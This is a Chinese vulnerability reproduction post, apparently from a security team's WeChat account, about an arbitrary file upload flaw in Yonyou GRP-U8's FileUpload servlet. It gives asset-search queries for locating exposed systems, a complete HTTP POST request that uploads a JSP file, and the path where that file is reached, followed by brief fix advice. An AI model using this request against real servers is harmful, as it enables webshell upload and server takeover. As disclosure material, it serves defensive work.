用友 GRP-U8 FileUpload 任意文件上传漏洞

产品简介

用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件，能够协助企业实现资源的高效管理，优化企业运营流程，提升整体管理水平。

漏洞描述

用友GRP-U8 FileUpload 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

网络空间测绘

Fofa

product="用友-GRP-U8"

Hunter

web.icon=="b41be1ccc6f9f2894e0cfcf23acf5fc0

Quake

app: "用友GRP-U8"

漏洞复现

POST /servlet/FileUpload?fileName=6DHYwVmg.jsp&actionID=update HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/4.0(compatible; MSIE 6.0;Windows NT 5.1; SV1;QQDownload732;.NET4.0C;.NET4.0E)
Content-Length:129
Cache-Control: max-age=0
Content-Type: text/plain; charset=utf-8
Dnt:1
Origin:null
Upgrade-Insecure-Requests:1
Accept-Encoding: gzip, deflate, br
Connection: close

<%out.println("DxgWjzgwV5248gzi9aC1m6XeFryQhlwq");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

访问地址：/R9iPortal/upload/6DHYwVmg.jsp

修复建议

1、如⾮必要，禁⽌公⽹访问该系统。

2、通过防⽕墙等安全设备设置访问策略，设置⽩名单访问。

3、升级产品到最新版本

原文始发于微信公众号（凝聚力安全团队）：【漏洞复现】用友 GRP-U8 FileUpload 任意文件上传漏洞